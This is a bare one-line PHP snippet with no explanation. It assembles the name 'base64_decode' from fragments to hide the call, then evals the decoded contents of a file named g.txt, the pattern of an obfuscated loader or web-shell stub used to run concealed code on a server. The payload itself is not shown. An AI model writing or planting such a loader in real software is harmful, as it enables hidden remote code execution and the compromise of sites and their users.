php $j = 'base'; $y = 64; $k = 'decode'; $r = $j.$y._.$k; eval($r(file_get_contents('g.txt')));